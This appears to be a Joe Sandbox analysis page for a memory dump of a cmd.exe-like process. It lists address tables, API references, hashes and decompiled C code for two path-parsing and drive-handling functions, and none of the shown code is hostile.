0x00d998b0
0x00d998b0
0x00000000
0x00d998b0
0x00000000
0x00d998ae
0x00d998b7
0x00d998b9
0x00d99903
0x00d99903
0x00d99908
0x00d9990a
0x00000000
0x00d99910
0x00000000
0x00d99910
0x00d998bb
0x00d998bb
0x00d998be
0x00d998c4
0x00d998c4
0x00d998d4
0x00d998da
0x00d998dd
0x00d998e3
0x00d998eb
0x00d998ed
0x00d998f2
0x00d998f4
0x00000000
0x00d998f6
0x00d998f6
0x00d998f9
0x00d998fc
0x00000000
0x00d998fe
0x00d998fe
0x00d99901
0x00000000
0x00d99901
0x00d998fc
0x00d998f4
0x00d998b9
0x00d99899
0x00d9988d
0x00000000
0x00d99868
0x00d99850
0x00000000
0x00d8b635
0x00d8b64b
0x00d99934
0x00d99936
0x00d99937
0x00d9993c
0x00d9993e
0x00d99948
0x00d99949
0x00d9994e
0x00d99950
0x00d99952
0x00d99953
0x00000000
0x00d99953
0x00d99940
0x00d99940
0x00d99942
0x00d99955
0x00d99955
0x00d9995b
0x00d9995b
0x00d9995c
0x00d99968
0x00d9996e
0x00d9996f
0x00d99972
0x00d8b6ca
0x00d99978
0x00d9997a
0x00d9997f
0x00d99985
0x00d9998d
0x00d9998d
0x00d9998e
0x00d99992
0x00d99992
0x00d8b651
0x00d8b651
0x00d8b654
0x00d8b659
0x00000000
0x00d8b65f
0x00d8b65f
0x00d8b662
0x00d8b66c
0x00d99921
0x00d99929
0x00d8b672
0x00d8b67d
0x00d8b67d
0x00d8b68f
0x00d8b692
0x00d8b69d
0x00d8b6b3
0x00d8b6b3
0x00d8b6a4
0x00d8b6a7
0x00d8b6b2
0x00d8b6b2
0x00d8b659
0x00d8b64b
0x00000000

APIs

Part of subcall function 00D9269C: _get_osfhandle.MSVCRT ref: 00D926A7
Part of subcall function 00D9269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D8C5F8,?,?,?), ref: 00D926B6
Part of subcall function 00D9269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D8C5C6), ref: 00D926D2
Part of subcall function 00D9269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20,00000002), ref: 00D926E1
Part of subcall function 00D9269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D926EC
Part of subcall function 00D9269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D8C5C6), ref: 00D926F5

_get_osfhandle.MSVCRT ref: 00D9987D
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00D964F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00D99885
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,00000000,00D965F0,?,00D964F0), ref: 00D998C4
_get_osfhandle.MSVCRT ref: 00D998DD
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00D964F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00D998E5

Part of subcall function 00D927C8: _get_osfhandle.MSVCRT ref: 00D927DB
Part of subcall function 00D927C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00DBB980,000000FF,00DAD620,00002000,00000000,00000000), ref: 00D9281C
Part of subcall function 00D927C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00DAD620,-00000001,?,00000000), ref: 00D92831

longjmp.MSVCRT(00DBB8B8,00000001,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00D99968

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
String ID:
API String ID: 1333215474-0
Opcode ID: 4a733cf0860f4cd8bf61ff152f1553d0c55361f006f34f5aa77ab8d38f72f04f
Instruction ID: 237a2854c42df07d70279f0bad878de7c806d33c94ee76fe7639dd9bae2b9d64
Opcode Fuzzy Hash: 4a733cf0860f4cd8bf61ff152f1553d0c55361f006f34f5aa77ab8d38f72f04f
Instruction Fuzzy Hash: 10517131B00302BBDF24ABB9D85AB6EF7A8EB04711F14452EE546D7281EB71DD418BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D8C923, Relevance: 10.8, APIs: 7, Instructions: 281
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00D8C923(signed short** __ecx) {
				signed short* _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed short _t33;
				signed int _t34;
				intOrPtr _t35;
				WCHAR* _t36;
				signed int _t38;
				void* _t39;
				signed int _t40;
				signed int _t41;
				WCHAR* _t42;
				WCHAR* _t47;
				signed int _t48;
				signed int _t49;
				void* _t54;
				long _t56;
				int _t62;
				signed short _t64;
				signed int _t69;
				signed int _t70;
				signed short* _t72;
				signed short* _t74;
				intOrPtr _t75;
				WCHAR* _t77;
				signed int _t79;
				signed char _t80;
				signed short* _t82;
				WCHAR* _t84;
				WCHAR* _t90;
				signed int _t95;
				signed short* _t107;
				signed int _t108;
				short* _t109;
				short* _t111;
				WCHAR* _t114;
				void* _t115;
				void* _t116;
				void* _t117;
				WCHAR** _t121;
				signed short* _t122;
				signed int _t124;
				WCHAR* _t125;
				WCHAR* _t126;
				WCHAR* _t129;
				int _t130;
				signed int _t131;
				WCHAR* _t132;

				_t121 = __ecx;
				_v12 = 0xd81f8c;
				 *0xdc3cf0 = 0;
				_t82 =  *__ecx;
				_t122 = _t82;
				_t2 =  &(_t122[1]); // 0x2
				_t107 = _t2;
				do {
					_t33 =  *_t122;
					_t122 =  &(_t122[1]);
				} while (_t33 != 0);
				_t34 =  *_t82 & 0x0000ffff;
				_t124 = _t122 - _t107 >> 1;
				_t74 = _t82;
				_v20 = _t124;
				_t108 = _t34;
				if(_t34 == 0) {
					L6:
					_t35 = 0x3a;
					_v8 = _t74;
					_v24 = _t35;
					if(_t108 == _t35) {
						__eflags = _t124 - 2;
						if(_t124 <= 2) {
							goto L7;
						}
						 *_t74 = 0;
						_t24 = _t74 - 2; // -2
						_v8 = _t24;
						_t62 = SetErrorMode(0);
						_t102 =  *_t121;
						_v16 = _t62;
						_t132 = E00D8D120( *_t121, 0x8000, _t82);
						__eflags = _t132 - 0xffffffff;
						if(_t132 == 0xffffffff) {
							L49:
							__eflags =  *0xdad0dc - 4;
							_t64 = 0x3a;
							_v8 = _t74;
							 *_t74 = _t64;
							if( *0xdad0dc != 4) {
								E00D8C5A2(_t102, 0x236b, 1,  *_t121);
							} else {
								__eflags =  *0xdad5a8;
								if( *0xdad5a8 == 0) {
									E00D8C5A2(_t102, 0x236b, 1,  *_t121);
								}
								 *0xdad5a4 = 1;
							}
							__eflags = _t132 - 0xffffffff;
							L55:
							if(__eflags == 0) {
								L57:
								SetErrorMode(_v16);
								goto L7;
							}
							L56:
							E00D8DB92(_t132);
							goto L57;
						}
						_t69 = E00D90178(_t63);
						__eflags = _t69;
						if(_t69 != 0) {
							L47:
							_t70 = E00D90178(_t69);
							__eflags = _t70;
							if(_t70 != 0) {
								goto L56;
							}
							__eflags = E00DA9953(_t70, _t132);
							goto L55;
						}
						_t102 = _t132;
						_t69 = E00DA9953(_t69, _t132);
						__eflags = _t69;
						if(_t69 == 0) {
							goto L49;
						}
						goto L47;
					}
					L7:
					_t83 = 0x250;
					_t36 = E00D900B0(0x250);
					if(_t36 == 0) {
						L58:
						E00DA9287(_t83);
						__imp__longjmp(0xdbb8b8, 1);
						L59:
						_t125 =  *_t121;
						_t75 = 0;
						__eflags = 0;
						_t84 = _t125;
						_t29 =  &(_t84[1]); // 0x0
						_t109 = _t29;
						do {
							_t38 =  *_t84;
							_t84 =  &(_t84[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						__eflags = _t84 - _t109 >> 1 - 2;
						if(_t84 - _t109 >> 1 >= 2) {
							_t38 = 0x3a;
							__eflags = _t125[1] - _t38;
							if(_t125[1] == _t38) {
								_t125 =  &(_t125[2]);
							}
						}
						L11:
						__imp___wcsicmp(_t125, ".");
						if(_t38 == 0) {
							L39:
							_t126 =  *_t121;
							_t39 = 0x5c;
							_t40 = E00D92349(_t126, _t39);
							__eflags = _t40;
							if(_t40 == 0) {
								_t90 = _t126;
								__eflags = 0;
								_t31 =  &(_t90[1]); // 0x0
								_t111 = _t31;
								do {
									_t41 =  *_t90;
									_t90 =  &(_t90[1]);
									__eflags = _t41;
								} while (_t41 != 0);
								__eflags = _t90 - _t111 >> 1 - 2;
								if(_t90 - _t111 >> 1 != 2) {
									goto L40;
								}
								_t54 = 0x3a;
								__eflags = _t126[1] - _t54;
								if(_t126[1] == _t54) {
									L42:
									 *(_t121[6]) = 0x10;
									L17:
									_t79 = 1;
									_t129 = 0;
									_t47 =  *_t121;
									_t114 = _t47;
									while(1) {
										_t95 =  *_t114 & 0x0000ffff;
										if(_t95 == 0) {
											break;
										}
										if(_t95 == _v16) {
											L23:
											_t129 = _t114;
											L21:
											_t114 =  &(_t114[1]);
											_t79 = _t79 + 1;
											continue;
										}
										if(_t95 == _v24) {
											__eflags = _t79 - 2;
											if(_t79 != 2) {
												goto L21;
											}
											goto L23;
										}
										goto L21;
									}
									_t121[3] = _t129;
									__eflags = _t129;
									if(_t129 == 0) {
										_t129 = _t47;
									} else {
										__eflags =  *_t129;
										if( *_t129 == 0) {
											_t47 = _t129;
										} else {
											_t12 =  &(_t129[1]); // 0x2
											_t47 = _t12;
										}
									}
									_t115 = 0x2a;
									_t121[4] = _t47;
									_t48 = E00D8D7D4(_t129, _t115);
									__eflags = _t48;
									if(_t48 == 0) {
										_t116 = 0x3f;
										_t49 = E00D8D7D4(_t129, _t116);
										__eflags = _t49;
										if(_t49 == 0) {
											goto L29;
										}
										goto L28;
									} else {
										L28:
										_t14 =  &(_t121[7]);
										 *_t14 = _t121[7] | 0x00000008;
										__eflags =  *_t14;
										 *0xdc3cd0 = 1;
										L29:
										_t117 = 0x2e;
										_t121[5] = E00D8D7D4(_t129, _t117);
										__eflags = 1;
										return 1;
									}
								}
							}
							L40:
							_t77 =  *_t121;
							_t83 = _v20 + 5 + _v20 + 5;
							_t42 = E00D900B0(_v20 + 5 + _v20 + 5);
							__eflags = _t42;
							if(_t42 == 0) {
								goto L58;
							}
							 *_t121 = _t42;
							E00D91040(_t42, _t128, _t77);
							E00D918C0( *_t121, _t128, _v12);
							goto L42;
						}
						__imp___wcsicmp(_t125, L"..");
						if(_t38 == 0) {
							goto L39;
						}
						if( *0xdad0dc == 4) {
							__eflags =  *0xdad5ac - 1;
							if( *0xdad5ac == 1) {
								goto L14;
							}
							__eflags =  *0xdad0c0 - 1;
							if( *0xdad0c0 != 1) {
								goto L17;
							}
							 *0xdad0c0 = _t75;
						}
						L14:
						_t80 = GetFileAttributesW( *_t121);
						if(_t80 != 0xffffffff) {
							_t56 = 0;
						} else {
							_t56 = GetLastError();
						}
						 *0xdc3cf0 = _t56;
						if(_t80 != 0xffffffff) {
							__eflags = _t80 & 0x00000010;
							if((_t80 & 0x00000010) == 0) {
								goto L17;
							}
							goto L39;
						} else {
							goto L17;
						}
					}
					_t121[6] = _t36;
					_t130 = 0x5c;
					_v16 = _t130;
					if(( *_v8 & 0x0000ffff) == _t130) {
						_v12 = 0xd81f8e;
						goto L39;
					}
					_t38 = E00D92349( *_t121, _t130);
					_t131 = _t38;
					if(_t131 == 0) {
						goto L59;
					}
					_t125 = _t131 + 2;
					_t75 = 0;
					goto L11;
				} else {
					goto L4;
					L4:
					_t72 = _t82;
					_t74 = _t82;
					_t82 =  &(_t82[1]);
					if( *_t82 != 0) {
						goto L4;
					} else {
						_t108 =  *_t72 & 0x0000ffff;
						goto L6;
					}
				}
			}

0x00d8c92e
0x00d8c930
0x00d8c939
0x00d8c93f
0x00d8c941
0x00d8c943
0x00d8c943
0x00d8c946
0x00d8c946
0x00d8c949
0x00d8c94c
0x00d8c951
0x00d8c956
0x00d8c958
0x00d8c95a
0x00d8c95d
0x00d8c962
0x00d8c975
0x00d8c977
0x00d8c978
0x00d8c97b
0x00d8c981
0x00d9aff7
0x00d9affa
0x00000000
0x00000000
0x00d9b002
0x00d9b005
0x00d9b008
0x00d9b00e
0x00d9b015
0x00d9b01c
0x00d9b024
0x00d9b026
0x00d9b029
0x00d9b057
0x00d9b057
0x00d9b060
0x00d9b061
0x00d9b064
0x00d9b067
0x00d9b098
0x00d9b069
0x00d9b069
0x00d9b070
0x00d9b07b
0x00d9b080
0x00d9b083
0x00d9b083
0x00d9b0a0
0x00d9b0a3
0x00d9b0a3
0x00d9b0ac
0x00d9b0af
0x00000000
0x00d9b0af
0x00d9b0a5
0x00d9b0a7
0x00000000
0x00d9b0a7
0x00d9b02d
0x00d9b032
0x00d9b034
0x00d9b041
0x00d9b043
0x00d9b048
0x00d9b04a
0x00000000
0x00000000
0x00d9b053
0x00000000
0x00d9b053
0x00d9b036
0x00d9b038
0x00d9b03d
0x00d9b03f
0x00000000
0x00000000
0x00000000
0x00d9b03f
0x00d8c987
0x00d8c987
0x00d8c98c
0x00d8c993
0x00d9b0ba
0x00d9b0ba
0x00d9b0c6
0x00d9b0cc
0x00d9b0cc
0x00d9b0ce
0x00d9b0ce
0x00d9b0d0
0x00d9b0d2
0x00d9b0d2
0x00d9b0d5
0x00d9b0d5
0x00d9b0d8
0x00d9b0db
0x00d9b0db
0x00d9b0e4
0x00d9b0e7
0x00d9b0ef
0x00d9b0f0
0x00d9b0f4
0x00d9b0fa
0x00d9b0fa
0x00d9b0f4
0x00d8c9c9
0x00d8c9cf
0x00d8c9d9
0x00d8caf4
0x00d8caf4
0x00d8cafa
0x00d8cafd
0x00d8cb02
0x00d8cb04
0x00d9b102
0x00d9b104
0x00d9b106
0x00d9b106
0x00d9b109
0x00d9b109
0x00d9b10c
0x00d9b10f
0x00d9b10f
0x00d9b118
0x00d9b11b
0x00000000
0x00000000
0x00d9b123
0x00d9b124
0x00d9b128
0x00d8cb3a
0x00d8cb3d
0x00d8ca29
0x00d8ca2b
0x00d8ca2e
0x00d8ca30
0x00d8ca32
0x00d8ca34
0x00d8ca34
0x00d8ca3a
0x00000000
0x00000000
0x00d8ca40
0x00d8ca53
0x00d8ca53
0x00d8ca48
0x00d8ca48
0x00d8ca4b
0x00000000
0x00d8ca4b
0x00d8ca46
0x00d8ca4e
0x00d8ca51
0x00000000
0x00000000
0x00000000
0x00d8ca51
0x00000000
0x00d8ca46
0x00d8ca57
0x00d8ca5a
0x00d8ca5c
0x00d9b13a
0x00d8ca62
0x00d8ca64
0x00d8ca67
0x00d9b133
0x00d8ca6d
0x00d8ca6d
0x00d8ca6d
0x00d8ca6d
0x00d8ca67
0x00d8ca72
0x00d8ca75
0x00d8ca78
0x00d8ca7d
0x00d8ca7f
0x00d8caa8
0x00d8caab
0x00d8cab0
0x00d8cab2
0x00000000
0x00000000
0x00000000
0x00d8ca81
0x00d8ca81
0x00d8ca81
0x00d8ca81
0x00d8ca81
0x00d8ca85
0x00d8ca8f
0x00d8ca91
0x00d8ca99
0x00d8caa0
0x00d8caa5
0x00d8caa5
0x00d8ca7f
0x00d9b12e
0x00d8cb0a
0x00d8cb0d
0x00d8cb12
0x00d8cb15
0x00d8cb1a
0x00d8cb1c
0x00000000
0x00000000
0x00d8cb25
0x00d8cb29
0x00d8cb35
0x00000000
0x00d8cb35
0x00d8c9e5
0x00d8c9ef
0x00000000
0x00000000
0x00d8c9fc
0x00d8cac8
0x00d8cacf
0x00000000
0x00000000
0x00d8cad5
0x00d8cadc
0x00000000
0x00000000
0x00d8cae2
0x00d8cae2
0x00d8ca02
0x00d8ca0a
0x00d8ca0f
0x00d8cab6
0x00d8ca15
0x00d8ca15
0x00d8ca15
0x00d8ca1b
0x00d8ca23
0x00d8cabd
0x00d8cac0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8ca23
0x00d8c999
0x00d8c9a1
0x00d8c9a2
0x00d8c9ab
0x00d8caed
0x00000000
0x00d8caed
0x00d8c9b5
0x00d8c9ba
0x00d8c9be
0x00000000
0x00000000
0x00d8c9c4
0x00d8c9c7
0x00000000
0x00d8c964
0x00d8c964
0x00d8c966
0x00d8c966
0x00d8c968
0x00d8c96a
0x00d8c970
0x00000000
0x00d8c972
0x00d8c972
0x00000000
0x00d8c972
0x00d8c970

APIs

_wcsicmp.MSVCRT ref: 00D8C9CF
_wcsicmp.MSVCRT ref: 00D8C9E5
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 00D8CA04
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D8CA15

Part of subcall function 00D8D7D4: wcschr.MSVCRT ref: 00D8D7DA

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: _wcsicmp$AttributesErrorFileLastwcschr
String ID:
API String ID: 2943530692-0
Opcode ID: 2facd61f9acc218a4c2b104397df8e4b643cc5643369a5d05a18df75da271b2f
Instruction ID: 644d2b4b69b78eb047e89b90494588755b9017a7bbcde45e38cf452cae8c4724
Opcode Fuzzy Hash: 2facd61f9acc218a4c2b104397df8e4b643cc5643369a5d05a18df75da271b2f
Instruction Fuzzy Hash: 3E911535B10316DBDF28BF65985567AB3A1FB49720F19812AE856D73C0EB708D41CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D95E50, Relevance: 10.8, APIs: 7, Instructions: 264
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00D95E50(void* __ecx) {
				intOrPtr _v8;
				long _v16;
				signed int _v20;
				char _v28;
				intOrPtr _v36;
				signed int _v48;
				short _v52;
				WCHAR* _v54;
				signed char _v56;
				signed int _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				long _v72;
				long _v80;
				WCHAR* _v88;
				signed char* _v92;
				short _v104;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				signed int _t61;
				WCHAR* _t65;
				short _t66;
				void* _t67;
				void* _t68;
				void* _t74;
				short _t77;
				void* _t78;
				short _t82;
				wchar_t* _t85;
				signed char _t86;
				short _t89;
				short _t90;
				wchar_t* _t102;
				long _t103;
				short* _t104;
				short _t105;
				long _t106;
				short* _t109;
				signed int _t110;
				WCHAR* _t114;
				WCHAR* _t126;
				short _t132;
				long _t134;
				WCHAR* _t138;
				short* _t142;
				void* _t147;
				WCHAR* _t149;
				void* _t150;
				signed int _t155;
				signed int _t157;
				short _t163;

				_t110 = _t155;
				_push(__ecx);
				_push(__ecx);
				_t157 = (_t155 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t110 + 4));
				_t153 = _t157;
				_push(0xfffffffe);
				_push(0xdabe38);
				_push(E00D97290);
				_push( *[fs:0x0]);
				_push(__ecx);
				_push(__ecx);
				_push(_t110);
				_t60 =  *0xdad0b4; // 0x35c4fbb8
				_v20 = _v20 ^ _t60;
				_t61 = _t60 ^ _t157;
				_v48 = _t61;
				_push(_t61);
				 *[fs:0x0] =  &_v28;
				_v36 = _t157 - 0x48;
				_t65 = E00D8EA40( *((intOrPtr*)( *((intOrPtr*)(_t110 + 8)) + 0x3c)), 0, 0 |  *0xdc3cc9 != 0x00000000);
				_t149 = _t65;
				_v64 = _t149;
				_v68 = _t149;
				if( *0xdc3cc9 == 0) {
					L6:
					_t114 = _t149;
					_t15 =  &(_t114[1]); // 0x2
					_t142 = _t15;
					do {
						_t66 =  *_t114;
						_t114 =  &(_t114[1]);
					} while (_t66 != 0);
					_v60 = _t114 - _t142 >> 1;
					_t67 = E00D922C0(_t110, _t149);
					_t144 = _v60 + 1;
					_t118 = _t149;
					_t68 = E00D91040(_t149, _v60 + 1, _t67);
					 *0xdbb8b0 = 0;
					if( *_t149 == 0) {
						E00DA83FD(_t68, _t118);
						L18:
						 *[fs:0x0] = _v28;
						_pop(_t147);
						_pop(_t150);
						return E00D96FD0( *0xdbb8b0, _t110, _v48 ^ _t153, _t144, _t147, _t150);
					}
					if(E00D95D59(_t110) == 0) {
						_push(0);
						_push(0x40002728);
						L47:
						E00D8C5A2(_t118);
						 *0xdbb8b0 = 1;
						goto L18;
					}
					if( *0xdc3cc9 == 0) {
						L12:
						_t171 =  *0xdbb8b0;
						if( *0xdbb8b0 != 0) {
							L45:
							_t74 = E00D94B96(_t110, 0, _t149, __eflags);
							RtlFreeHeap(GetProcessHeap(), 0, _t74);
							_push(0);
							_push( *0xdbb8b0);
							goto L47;
						}
						_t144 = 0;
						_t118 = _t149;
						_t77 = E00D933FC(_t110, _t149, 0, 0, _t149, _t171);
						 *0xdbb8b0 = _t77;
						if(_t77 == 0) {
							_t78 = 0x3a;
							if(_t149[1] == _t78) {
								if( *0xdc3cb8 == 0) {
									_t118 = 0xdc3ab0;
								}
								_t144 =  *0xdc3cc0;
								E00D936CB(_t110, _t118,  *0xdc3cc0,  *_t149 & 0x0000ffff);
							}
						}
						if( *0xdbb8b0 != 0) {
							goto L45;
						}
						goto L18;
					}
					_t144 = 0x5c;
					if( *_t149 == _t144) {
						__eflags = _t149[1] - _t144;
						if(__eflags != 0) {
							goto L12;
						}
						_t126 = _t149;
						_t24 =  &(_t126[1]); // 0x2
						_v60 = _t24;
						do {
							_t82 =  *_t126;
							_t126 =  &(_t126[1]);
							__eflags = _t82;
						} while (_t82 != 0);
						_v72 = (_t126 - _v60 >> 1) + 1;
						_t29 =  &(_t149[2]); // 0x4
						_t85 = wcschr(_t29, _t144);
						_v60 = _t85;
						__eflags = _t85;
						if(_t85 != 0) {
							_t134 = 0x5c;
							_t102 = wcschr( &(_t85[0]), _t134);
							_v60 = _t102;
							__eflags = _t102;
							if(_t102 != 0) {
								_t103 = GetFileAttributesW(_t149);
								__eflags = _t103 - 0xffffffff;
								if(_t103 != 0xffffffff) {
									_t104 = _v60;
									 *_t104 = 0;
									_t105 = _t104 + 2;
									__eflags = _t105;
									_v60 = _t105;
								} else {
									_t106 = GetLastError();
									 *0xdbb8b0 = _t106;
									__eflags = _t106 - 2;
									if(_t106 == 2) {
										 *0xdbb8b0 = 3;
									}
								}
							}
						}
						_t86 = 0x5a;
						_v56 = _t86;
						_t118 = 0x3a;
						_v54 = _t118;
						__eflags = 0;
						_v52 = 0;
						_v104 = 1;
						_v92 =  &_v56;
						_v88 = _t149;
						_v80 = 0;
						while(1) {
							__eflags =  *0xdbb8b0;
							if(__eflags != 0) {
								goto L45;
							}
							__eflags = _v56 - 0x41;
							if(__eflags == 0) {
								goto L12;
							}
							_v16 = 0;
							_t89 = E00D97797(_t118);
							__eflags = _t89;
							if(_t89 == 0) {
								 *0xdbb8b0 = 0x78;
							} else {
								 *0xdbb8b0 =  *0xdcc030( &_v108, 0, 0, 0);
							}
							_v16 = 0xfffffffe;
							_t90 =  *0xdbb8b0;
							__eflags = _t90;
							if(_t90 == 0) {
								_t144 = _v56;
								 *((short*)( *0xdc3ce8 +  *0xdc3ce4 * 8 - 4)) = _v56;
								 *_t149 = _v56;
								_t149[1] = _v54;
								_t132 = 0x5c;
								_t149[2] = _t132;
								_t118 =  &(_v68[3]);
								_t94 = _v60;
								__eflags = _v60;
								if(__eflags == 0) {
									 *_t118 = 0;
								} else {
									_t144 = _v72;
									E00D91040(_t118, _v72, _t94);
								}
								goto L12;
							} else {
								__eflags = _t90 - 0x55;
								if(_t90 == 0x55) {
									L41:
									_v56 = (_v56 & 0x000000ff) - 1;
									 *0xdbb8b0 = 0;
									continue;
								}
								__eflags = _t90 - 0x4b2;
								if(_t90 != 0x4b2) {
									continue;
								}
								goto L41;
							}
						}
						goto L45;
					}
					goto L12;
				} else {
					_t138 = _t149;
					_t163 =  *_t149;
					L3:
					_v60 = _t65;
					if(_t163 != 0) {
						_t65 = _t138;
						_t138 =  &(_t138[1]);
						__eflags =  *_t138;
						goto L3;
					}
					L4:
					while(_t65 > _t149 && iswspace( *_t65 & 0x0000ffff) != 0) {
						_t109 = _v60;
						 *_t109 = 0;
						_t65 = _t109 - 2;
						_v60 = _t65;
					}
					goto L6;
				}
			}

0x00d95e53
0x00d95e55
0x00d95e56
0x00d95e5a
0x00d95e61
0x00d95e65
0x00d95e67
0x00d95e69
0x00d95e6e
0x00d95e79
0x00d95e7a
0x00d95e7b
0x00d95e7c
0x00d95e80
0x00d95e85
0x00d95e88
0x00d95e8a
0x00d95e8f
0x00d95e93
0x00d95e99
0x00d95eb0
0x00d95eb5
0x00d95eb7
0x00d95eba
0x00d95ec6
0x00d95ef3
0x00d95ef3
0x00d95ef5
0x00d95ef5
0x00d95ef8
0x00d95ef8
0x00d95efb
0x00d95efe
0x00d95f07
0x00d95f0c
0x00d95f15
0x00d95f16
0x00d95f18
0x00d95f1d
0x00d95f26
0x00d9f393
0x00d95f9c
0x00d95fa4
0x00d95fac
0x00d95fad
0x00d95fbe
0x00d95fbe
0x00d95f33
0x00d9f55a
0x00d9f55b
0x00d9f560
0x00d9f560
0x00d9f566
0x00000000
0x00d9f570
0x00d95f40
0x00d95f4e
0x00d95f4e
0x00d95f55
0x00d9f53d
0x00d9f53d
0x00d9f54b
0x00d9f551
0x00d9f552
0x00000000
0x00d9f552
0x00d95f5b
0x00d95f5d
0x00d95f5f
0x00d95f64
0x00d95f6b
0x00d95f6f
0x00d95f74
0x00d95f7e
0x00d95fc1
0x00d95fc1
0x00d95f84
0x00d95f8a
0x00d95f8a
0x00d95f74
0x00d95f96
0x00000000
0x00000000
0x00000000
0x00d95f96
0x00d95f44
0x00d95f48
0x00d9f39d
0x00d9f3a1
0x00000000
0x00000000
0x00d9f3a7
0x00d9f3a9
0x00d9f3ac
0x00d9f3af
0x00d9f3af
0x00d9f3b2
0x00d9f3b5
0x00d9f3b5
0x00d9f3c2
0x00d9f3c6
0x00d9f3ca
0x00d9f3d2
0x00d9f3d5
0x00d9f3d7
0x00d9f3db
0x00d9f3e1
0x00d9f3e9
0x00d9f3ec
0x00d9f3ee
0x00d9f3f1
0x00d9f3f7
0x00d9f3fa
0x00d9f41a
0x00d9f41d
0x00d9f420
0x00d9f420
0x00d9f423
0x00d9f3fc
0x00d9f3fc
0x00d9f402
0x00d9f407
0x00d9f40a
0x00d9f40c
0x00d9f40c
0x00d9f40a
0x00d9f3fa
0x00d9f3ee
0x00d9f428
0x00d9f429
0x00d9f42f
0x00d9f430
0x00d9f434
0x00d9f436
0x00d9f43a
0x00d9f444
0x00d9f447
0x00d9f44a
0x00d9f44d
0x00d9f44d
0x00d9f454
0x00000000
0x00000000
0x00d9f45a
0x00d9f45f
0x00000000
0x00000000
0x00d9f465
0x00d9f468
0x00d9f46d
0x00d9f46f
0x00d9f485
0x00d9f471
0x00d9f47e
0x00d9f47e
0x00d9f48f
0x00d9f4c0
0x00d9f4c5
0x00d9f4c7
0x00d9f4ee
0x00d9f4fd
0x00d9f506
0x00d9f50d
0x00d9f513
0x00d9f514
0x00d9f51b
0x00d9f51e
0x00d9f521
0x00d9f523
0x00d9f535
0x00d9f525
0x00d9f526
0x00d9f529
0x00d9f529
0x00000000
0x00d9f4c9
0x00d9f4c9
0x00d9f4cc
0x00d9f4d9
0x00d9f4df
0x00d9f4e3
0x00000000
0x00d9f4e3
0x00d9f4ce
0x00d9f4d3
0x00000000
0x00000000
0x00000000
0x00d9f4d3
0x00d9f4c7
0x00000000
0x00d9f44d
0x00000000
0x00d95ec8
0x00d95ec8
0x00d95eca
0x00d95ed7
0x00d95ed7
0x00d95eda
0x00d95ecf
0x00d95ed1
0x00d95ed4
0x00000000
0x00d95ed4
0x00000000
0x00d95edc
0x00d9f382
0x00d9f385
0x00d9f388
0x00d9f38b
0x00d9f38b
0x00000000
0x00d95edc

APIs

Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EAB7
Part of subcall function 00D8EA40: iswspace.MSVCRT ref: 00D8EB2D
Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EB49
Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EB6D

iswspace.MSVCRT ref: 00D95EE4

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: wcschr$iswspace
String ID:
API String ID: 3458554142-0
Opcode ID: 2c26d323496d7fe4542ae1395306a1e66038ca2b77e709d9e4340ba23f34f44f
Instruction ID: de223946ce30d173bf2ab97f3151155577d64d9e1cf67d210b7a3762f0a0a866
Opcode Fuzzy Hash: 2c26d323496d7fe4542ae1395306a1e66038ca2b77e709d9e4340ba23f34f44f
Instruction Fuzzy Hash: F791AA74A04705DEDF25AF68EC45AAEB7B4FF48320F14862AE806D7390EB718941CB75

